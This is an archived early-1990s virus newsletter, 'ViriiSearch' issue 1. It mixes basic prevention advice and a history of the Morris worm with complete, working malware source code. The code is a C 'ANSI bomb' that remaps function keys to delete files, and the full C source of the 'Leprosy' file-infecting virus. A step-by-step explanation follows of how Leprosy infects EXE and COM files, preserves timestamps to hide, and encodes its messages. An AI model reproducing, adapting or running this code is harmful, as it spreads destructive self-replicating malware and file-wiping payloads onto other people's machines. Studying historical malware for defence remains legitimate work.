💾 Archived View for spam.works › mirrors › textfiles › virus › vir-1.v1 captured on 2023-06-16 at 21:05:16.
-=-=-=-=-=-=-
DISCLAIMER: The author will NOT accept responsibility for any damage to your computer media and/or files, or responsibility for any action you might take that will result in legal proceedings, the source code, if any, in this newsletter is THE REAL THING, and you, after you read this, will be well aware of what virii are capable of, and knowing that, it is expected that you will act responsibly. DISCLAIMER II: All I know about programming I have learned on my own, and did not go to school for, and am still learning. As a result, I am sometimes prone to make mistakes, and be wrong about things, so please be patient if I should make a mistake, or say something that isn't true, which would be totally unintentional. ViriiSearch ----------- The Virus Research Newsletter Volume 1, Number 1 CREDITS: ----------------------------------------------------------------------------- Author...................................................Criminal Minded <tm> Editor...................................................Criminal Minded <tm> Ideas, Source, Examples Supplied By......................Criminal Minded <tm> Facts Stolen From Several Sources By.....................Criminal Minded <tm> ----------------------------------------------------------------------------- Introduction: Welcome To The First Issue Of Viriisearch, The Virus Research Newsletter. I have always had a fascination of computer virii, since I first heard the word. I, like a lot of people, had no idea what they were about, and was extremely curious. And this newsletter will cover my process as I find out more about them. How they are written, why they act like they do, and if possible, why people would write them. In this issue: Prevention And Protection Methods The "Internet Worm" Trojans, Worms, Virii, Ansi Bombs: What's the difference? Benign VS Malignant Virii Sample Source Code Of Virii Discussion Of The Infection And Encryption Methods Used By "Leprosy" The "Uncompress" Virus "Suicidal Tendencies" Department/Virus Of The Month Discussion Of Anti Viral Software Things You Should Know ----------------------------------------------------------------------------- Prevention And Protection Methods: ----------------------------------------------------------------------------- After the infamous "Michealangelo" panic, I realized what the masses are lacking is virus literacy. If people had a understanding of them, and knew the appropriate methods of prevention, and dealing with a infection, the situation would've never been blown out of proportion like it was. When I hear people ask questions such as "If I Put My Toothbrush Near A Infected Disk, Will I Catch The Virus When I Brush My Teeth?" I have to laugh...Ok, maybe that example is a little exaggerated, but some of the questions are hitting close to that level of stupidity, so here are some protection and prevention methods: 1. If you download a file from a public BBS, or a friend gives you a file that he downloaded from somewhere, be sure and uncompress the file onto a floppy and run your virus scanner on it. NEVER run a new file without checking it first. Some people believe a virus scanner can spot a file that is infected within a compressed file by running the virus scanner on it, this is NOT true. You have to decompress the file first. By doing this, you are dropping your chances of infection considerably BUT there is always the chance of a unknown virus that the scanner won't spot so that is why you have to ALWAYS have a backup of all your data on tape or disk. That way if the unknown virus wipes your hard drive, you have the backup and nothing is lost. 2. In the event of a virus infection, shut your computer off immediately and wait 10-20 seconds. NEVER do a "warm boot" (CTRL-ALT-DEL) because some virii can survive through a warm boot. Always do a "cold boot" (Shut the computer OFF). After the 10-20 seconds, boot your computer from a CLEAN WRITE PROTECTED DOS Bootable disk, and then run your virus scanner from a WRITE PROTECTED disk. (The reason for having the disks write protected is just in case the virus is still lurking around, it won't be able to write itself and infect the floppies). If the virus is a known one, have the virus scanner either fix the infected files, or delete them (and replace from your backup) or make a note of the infected files and erase them manually. 3. How do you spot a attack by a unknown virus? A) Change in sizes of files B) Change of file dates/times C) Deleted files D) Slower processing time E) Unusual messages F) Disk activity, more than usual (Writing to the disk when it's not neccesary) 4. What to do in the event of a unknown virus attack? A) Follow steps of shutting machine off and re-booting as outlined in #2 B) Run your virus scanner and have it look for files that changed in size or date (if your scanner has a feature that makes note of original virus sizes/dates/times) C) If your virus scanner doesn't make note of original sizes/dates/times you can always make note of them manually and then check them yourself. It's time consuming, but can prevent serious damage to your data, and you should try to isolate a infected file and send it to ME (info on how to get it to me at the end of the newsletter) so I can attempt to dissect it and notify the appropriate person of the new virus. D) Some virus scanners come with a TSR that will prevent any writing to disk, it will pop a window or message on the screen saying: Attempting to write to <filename> Do you wish to do so? If something is trying to write to a file that shouldn't be written to at that time, chances are you are dealing with a unknown virus and should say no. Then try to find and isolate the virus. E) How do you spot a unknown virus or a known virus without running a virus scanner? 1) Most virii are tiny (2 kilobytes to 10 kilobytes) and the majority of them are .COM files so if you have, let's say, a 6K .COM file that claims to be a "awesome game" I'd be a little bit suspicious. 2) Weird names. I would not run "DIE.COM" or "KILLER.COM" and over the years I have run into files named that, when people tried to infect my computer. At least they could've named it something else not so obvious. 3) As stated in #1, the MAJORITY of them are small .COM files but they can be .EXE files as well, and bigger then 10K. All it takes is a little bit of common sense, and 99% of what could've been virus attacks on your computer can be prevented. All you have to remember is that they cannot infect your machine unless run first...BUT there is one virus out there that, when uncompressed, activates itself. This virus does NOT have to be executed in order to infect your machine, and it will be discussed later on. In the event of where this "uncompress" virus wipes some of your data, or any other virus, that's what backups are for. ALWAYS HAVE A BACKUP OF YOUR HARD DRIVE and NEVER put a floppy in the drive and run a program when there is a virus in memory because, chances are, that floppy will get ruined/infected as well, unless it is write protected. The instant you are aware of a infection, shut the machine off! Because there are some virii that, upon finding a write protected floppy that it cannot infect, or something else it can't do, "get mad" and cause destruction. ----------------------------------------------------------------------------- The "Internet Worm" ----------------------------------------------------------------------------- This has to be the most widely publicized case of a virus attack ever. On 10/02/88, Robert Morris, a graduate student, wrote and released a worm that infected "Internet" the worldwide network. Within hours, it infected thousands of computers. The worm was benign, not causing any damage to files or media, but replicated itself over and over rapidly, and resulted in the computers on Internet having to be shut down and all copies of the worm removed. Some of the hosts were still disconnected from the network eight days later, showing the impact this worm had. Morris claimed he did it as a experiment, and made a mistake in how fast it actually would replicate. The media, namely NY Times, USA Today, and The Wall Street Journal, gave the worm front page coverage. On November 4th, teams at several insitutions went to work and successfully "decompiled" the worm and studied it in the language it was written in, "C language", but the source code was never released for fear of hackers using the source for malicious purposes. In the end, Morris was removed from school, ordered to pay $10,000 in fines, perform 400 hours of community services and was on 3 years probation. Some people argued as to whether or not Morris was guilty because he evidently didn't do it to cause damage, but rather as a experiment that went wrong. What the worm did: It hacked it's way into hosts attached to the internet by cracking passwords and then replicated itself rapidly, taking up all the memory and forcing the hosts to be shut down. ----------------------------------------------------------------------------- Trojans, Worms, Virii, Ansi Bombs: What's the difference? ----------------------------------------------------------------------------- Trojans: Programs disguised as a useful program or a existing real program that can cause damage on your system. Worms: Benign virii, rarely causing damage to media or files, such as the Internet worm. Ansi Bombs: Tiny programs that use ANSI to remap your keyboard causing keys, when pressed, to do other things. Example: If a ansi bomb was in memory, and it remapped the "K" key to erase all the files in the current directory, as soon as you pressed K the files would be gone. Usually when you type C>ERASE *.* MS-DOS will respond with: All the files in the current directory will be deleted! Are you sure (y/n)? Some ansi bombs are intelligent and can prevent such DOS messages from appearing. ----------------------------------------------------------------------------- Here is the source code to a simple ansi bomb: ----------------------------------------------------------------------------- #include <stdio.h> #define KILL(K, S) printf("\033[0;%d;\"%s\";13p", K, S) #define F1 59 #define F2 60 #define F3 61 #define F4 62 main() { KILL(F1, "DEL *.ZIP"); KILL(F2, "DEL *.ARJ"); KILL(F3, "DEL *.COM"); KILL(F4, "DEL *.EXE"); } ----------------------------------------------------------------------------- This just assigns the string (DEL *.ZIP etc) to the respective keys. If this ansi bomb was in memory, and you pressed F1, it would delete all the files in the current directory with the extension of .ZIP. The command (DEL *.ZIP) would appear on the screen though, and you could use a file recovery program to recover the deleted files. There are more lethal ansi bombs, ones that can format your hard drive and other such destructive acts. Prevention: Use NANSI or ZANSI rather than ANSI and the ansi bombs won't work. ----------------------------------------------------------------------------- Virii: Destructive programs that use 'stealth' techniques, and can replicate. Not All virii are destructive, some can be benign, and just pop up annoying messages time to time or slow down system speed. ----------------------------------------------------------------------------- No more will be discussed of ANSI Bombs or Trojans as this newsletter is dedicated entirely to virii. ----------------------------------------------------------------------------- Benign VS Malignant Virii: ----------------------------------------------------------------------------- Benign Virii do not cause damage but do things such as take up all the memory, slow processing speed down, and send annoying messages to the console, or the printer, etc... Maligant, or Malicious, Virii cause actual destruction, deleting files, destroying the FAT or boot sector, locking up the computer, formatting disks or hard drives, etc... ----------------------------------------------------------------------------- Virus Source Code: ----------------------------------------------------------------------------- Now for the real thing, we will start with the C Language source code to the "Leprosy" Virus. ----------------------------------------------------------------------------- #pragma inline #define CRLF "\x17\x14" /* CR/LF combo encrypted. */ #define NO_MATCH 0x12 /* No match in wildcard search. */ char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83."; char *virus_msg[3] = { CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.", CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.", CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14." }; struct _dta /* Disk Transfer Area format for find. */ { char findnext[21]; char attribute; int timestamp; int datestamp; long filesize; char filename[13]; } *dta = (struct _dta *) 0x80; /* Set it to default DTA. */ const char filler[] = "XX"; /* Pad file length to 666 bytes. */ const char *codestart = (char *) 0x100; /* Memory where virus code begins. */ const int virus_size = 666; /* The size in bytes of the virus code. */ const int infection_rate = 4; /* How many files to infect per run. */ char compare_buf[20]; /* Load program here to test infection. */ int handle; /* The current file handle being used. */ int datestamp, timestamp; /* Store original date and time here. */ char diseased_count = 0; /* How many infected files found so far. */ char success = 0; /* How many infected this run. */ /* The following are function prototypes, in keeping with ANSI */ /* Standard C, for the support functions of this program. */ int find_first( char *fn ); int find_healthy( void ); int find_next( void ); int healthy( void ); void infect( void ); void close_handle( void ); void open_handle( char *fn ); void print_s( char *s ); void restore_timestamp( void ); /*----------------------------------*/ /* M A I N P R O G R A M */ /*----------------------------------*/ int main( void ) { int x = 0; do { if ( find_healthy() ) { /* Is there an un-infected file? */ infect(); /* Well, then infect it! */ x++; /* Add one to the counter. */ success++; /* Carve a notch in our belt. */ } else { /* If there ain't a file here... */ _DX = (int) ".."; /* See if we can step back to */ _AH = 0x3b; /* the parent directory, and try */ asm int 21H; /* there. */ x++; /* Increment the counter anyway, to */ } /* avoid infinite loops. */ } while( x < infection_rate ); /* Do this until we've had enough. */ if ( success ) /* If we got something this time, */ print_s( fake_msg ); /* feed 'em the phony error line. */ else if ( diseased_count > 6 ) /* If we found 6+ infected files */ for( x = 0; x < 3; x++ ) /* along the way, laugh!! */ print_s( virus_msg[x] ); else print_s( fake_msg ); /* Otherwise, keep a low profile. */ return; } void infect( void ) { _DX = (int) dta->filename; /* DX register points to filename. */ _CX = 0x00; /* No attribute flags are set. */ _AL = 0x01; /* Use Set Attribute sub-function. */ _AH = 0x43; /* Assure access to write file. */ asm int 21H; /* Call DOS interrupt. */ open_handle( dta->filename ); /* Re-open the healthy file. */ _BX = handle; /* BX register holds handle. */ _CX = virus_size; /* Number of bytes to write. */ _DX = (int) codestart; /* Write program code. */ _AH = 0x40; /* Set up and call DOS. */ asm int 21H; restore_timestamp(); /* Keep original date & time. */ close_handle(); /* Close file. */ return; } int find_healthy( void ) { if ( find_first("*.EXE") != NO_MATCH ) /* Find EXE? */ if ( healthy() ) /* If it's healthy, OK! */ return 1; else while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */ if ( healthy() ) return 1; /* If you find one, great! */ if ( find_first("*.COM") != NO_MATCH ) /* Find COM? */ if ( healthy() ) /* If it's healthy, OK! */ return 1; else while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */ if ( healthy() ) return 1; /* If you find one, great! */ return 0; /* Otherwise, say so. */ } int healthy( void ) { int i; datestamp = dta->datestamp; /* Save time & date for later. */ timestamp = dta->timestamp; open_handle( dta->filename ); /* Open last file located. */ _BX = handle; /* BX holds current file handle. */ _CX = 20; /* We only want a few bytes. */ _DX = (int) compare_buf; /* DX points to the scratch buffer. */ _AH = 0x3f; /* Read in file for comparison. */ asm int 21H; restore_timestamp(); /* Keep original date & time. */ close_handle(); /* Close the file. */ for ( i = 0; i < 20; i++ ) /* Compare to virus code. */ if ( compare_buf[i] != *(codestart+i) ) return 1; /* If no match, return healthy. */ diseased_count++; /* Chalk up one more fucked file. */ return 0; /* Otherwise, return infected. */ } void restore_timestamp( void ) { _AL = 0x01; /* Keep original date & time. */ _BX = handle; /* Same file handle. */ _CX = timestamp; /* Get time & date from DTA. */ _DX = datestamp; _AH = 0x57; /* Do DOS service. */ asm int 21H; return; } void print_s( char *s ) { char *p = s; while ( *p ) { /* Subtract 10 from every character. */ *p -= 10; p++; } _DX = (int) s; /* Set DX to point to adjusted string. */ _AH = 0x09; /* Set DOS function number. */ asm int 21H; /* Call DOS interrupt. */ return; } int find_first( char *fn ) { _DX = (int) fn; /* Point DX to the file name. */ _CX = 0xff; /* Search for all attributes. */ _AH = 0x4e; /* 'Find first' DOS service. */ asm int 21H; /* Go, DOS, go. */ return _AX; /* Return possible error code. */ } int find_next( void ) { _AH = 0x4f; /* 'Find next' function. */ asm int 21H; /* Call DOS. */ return _AX; /* Return any error code. */ } void open_handle( char *fn ) { _DX = (int) fn; /* Point DX to the filename. */ _AL = 0x02; /* Always open for both read & write. */ _AH = 0x3d; /* "Open handle" service. */ asm int 21H; /* Call DOS. */ handle = _AX; /* Assume handle returned OK. */ return; } void close_handle( void ) { _BX = handle; /* Load BX register w/current file handle. */ _AH = 0x3e; /* Set up and call DOS service. */ asm int 21H; return; } ----------------------------------------------------------------------------- With source code discussed in this newsletter, main areas covered will be on encryption techniques, how the virus infects files, how they 'replicate' and 'breed' and how 'stealth techniques' are implemented in the code. In this case we will cover how the virus infects the files and encrypts. ----------------------------------------------------------------------------- Infection Method: ----------------------------------------------------------------------------- void infect( void ) { _DX = (int) dta->filename; /* DX register points to filename. */ _CX = 0x00; /* No attribute flags are set. */ _AL = 0x01; /* Use Set Attribute sub-function. */ _AH = 0x43; /* Assure access to write file. */ asm int 21H; /* Call DOS interrupt. */ open_handle( dta->filename ); /* Re-open the healthy file. */ _BX = handle; /* BX register holds handle. */ _CX = virus_size; /* Number of bytes to write. */ _DX = (int) codestart; /* Write program code. */ _AH = 0x40; /* Set up and call DOS. */ asm int 21H; restore_timestamp(); /* Keep original date & time. */ close_handle(); /* Close file. */ return; } ----------------------------------------------------------------------------- void infect( void ) is just what he named this function. The function will return nothing, and be called with no parameters as the two "voids" suggest. Register DX points to the filename as declared in the structure "_dta" ----------------------------------------------------------------------------- _dta structure: ----------------------------------------------------------------------------- struct _dta { char findnext[21]; char attribute; int timestamp; int datestamp; long filesize; char filename[13]; } *dta = (struct _dta *) 0x80; ----------------------------------------------------------------------------- Next in the "infect" function, 0x00 is assigned to the CX register. With function 43H in assembly, register CX is assigned with the bit of the attribute that you want to set the file to. Bit: Attribute: 0 Read Only 1 Hidden 2 System 3-4 Reserved 5 Archive 6-15 Reserved Because the author assigned 0x00 to CX, none of the above attributes were set on the file, allowing it to be written to. Next in the "infect" function is 0x01 being assigned to register AL 0x01 is telling the program we want to SET attributes. Then following that is: 0x43 being assigned to AH Which is telling the program we want to use function 43H (Get/Set Attributes) The current handle is assigned to register BX The size of the virus code, or the number of bytes to write, stored in the integer "virus_size" is assigned to register CX virus_size is declared and initialized at the beginning of the source code as a integer with the value "666" Then the virus code is written to the file, the file is closed and the original date and time the file had are restored. ----------------------------------------------------------------------------- The Method Of Encryption: ----------------------------------------------------------------------------- void print_s( char *s ) { char *p = s; while ( *p ) { /* Subtract 10 from every character. */ *p -= 10; p++; } _DX = (int) s; /* Set DX to point to adjusted string. */ _AH = 0x09; /* Set DOS function number. */ asm int 21H; /* Call DOS interrupt. */ return; } ----------------------------------------------------------------------------- The above function used in "Leprosy", called "print_s" accepts one parameter, a string of text, like these ones defined at the beginning of the Leprosy source code: ----------------------------------------------------------------------------- char *virus_msg[3] = { CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.", CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.", CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14." }; ----------------------------------------------------------------------------- Note: CRLF is defined as "\x17\x14" at the beginning of the source, \x17 being the hexadecimal code for a carriage return and \x14 the code for a line feed. ----------------------------------------------------------------------------- When a string is passed to the "print_s" function, it is un-encrypted. print_s(virus_msg[0]); print_s(virus_msg[1]); print_s(virus_msg[2]); would result in the following being printed to the screen: ------------------------------------------------------------ NEWS FLASH!! Your system has been infected with the incurable decay of LEPROSY 1.00, a virus invented by PCM2 in June of 1990. Good luck! ----------------------------------------------------------- The compiler I currently use does not accept inline assembly code as the author of leprosy had in his source so I modified the "print_s" function so I could compile it: For those interested, I use Microsoft Quick C (C) Microsoft ----------------------------------------------------------- /* NOTE: I removed the . from the end of each message because that is */ /* A $ when un-encrypted, and the $ to terminate the string is only */ /* required for the assembly version of the "print_s" function */ /* Also: The hexadecimal constants in the strings are as follows: */ /* \x13 = TAB, \x7f = u, \x83 = y, \x81 = w, \x80 = v */ #include <stdio.h> #define CRLF "\x17\x14" char *virus_msg[3] = { CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro", CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83", CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14" }; void print_s (char *s); int main (void); main() { print_s(virus_msg[0]); print_s(virus_msg[1]); print_s(virus_msg[2]); } void print_s (char *s) { char *p = s; while ( *p ) { *p -= 10; p++; } printf("%s\n",s); } -----------------------------------------------------------------------------